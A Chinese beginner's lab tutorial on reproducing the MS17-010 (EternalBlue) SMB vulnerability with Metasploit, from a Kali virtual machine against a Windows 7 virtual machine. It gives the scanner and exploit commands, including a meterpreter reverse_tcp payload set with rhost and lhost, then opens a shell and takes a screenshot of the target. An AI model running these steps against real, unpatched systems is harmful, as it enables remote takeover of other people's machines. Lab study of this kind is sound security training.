新手学习渗透测试——利用MSF复现ms17-010漏洞
该漏洞的核心就是永恒之蓝漏洞(CVE-2017-0144),是一种危害极大的远程代码执行漏洞(RCE),受影响的Windows系统版本包括以下
*Windows Vista
*Windows 7
*Windows 8.1
*Windows Server 2008/2012/2016
*Windows XP
*Windows 10早期版本
本文章不会详细讨论该漏洞的原理,以及如何防护,重在使用MSF工具对其进行复现,环境如下
攻击机:Kali Linux 2026版
靶机:Windows 7 64位操作系统
两台虚拟机均采用NAT模式
Kali先进入root模式,我们先对两台虚拟机的IP做一个确定,在Kali的命令行中输入ifconfig,Windows7命令行中输入ipconfig结果分别如下


可以看到kali的IP为192.168.137.130,Windows7的IP为192.168.137.131
接下来我们对两台虚拟机进行连通性测试,分别用ping命令,结果如下


可以看到两台虚拟机之间可以连通,如果出现了Windows7能ping通kali,但是kali不能ping通Windows7的情况,可以尝试关闭Windows7的防火墙再尝试,接下来我们将用nmap对Windows7系统进行扫描

可以注意到Windows7系统的445端口是开启状态,而445端口默认的是采用的SMB协议,ms17-010漏洞本质上来源于SMB协议,因此我们输入命令msfconsole打开MSF,并利用search命令查找是否有关于ms17-010的漏洞信息和利用脚本

可以看到有许多针对于ms17-010的脚本工具,注意到24是用于扫描目标主机是否存在ms17-010漏洞,输入命令use 24,并利用show options命令,查看需要配置什么参数

可以看到必选参数还有目标主机的IP,使用set rhost 目标主机IP来配置,并输入run运行起来

可以看到结果是很可能存在ms17-010漏洞,接下来我们输入以下命令开始构造payload
use 0
set payload windows/x64/meterpreter/reverse_tcp
set rhost 目标主机IP
set lhost 攻击机IP
最后run开始攻击,攻击成功的结果如下

我们可按help看我们可以对靶机干嘛,或者输入shell,进入靶机的命令行

这里可能显示有乱码,这是由于两个操作系统采用的编码格式不一致导致的,最后我们来搞一点破坏吧,输入exit退回到msf的命令行,输入screenshot来为我们的靶机截一张图

总结一下,这是一篇简单的渗透测试流程,主要是熟悉ms17-010漏洞的影响范围以及可能出现的标识,外加熟练对工具MSF的使用。
openEuler 是由开放原子开源基金会孵化的全场景开源操作系统项目,面向数字基础设施四大核心场景(服务器、云计算、边缘计算、嵌入式),全面支持 ARM、x86、RISC-V、loongArch、PowerPC、SW-64 等多样性计算架构
更多推荐



所有评论(0)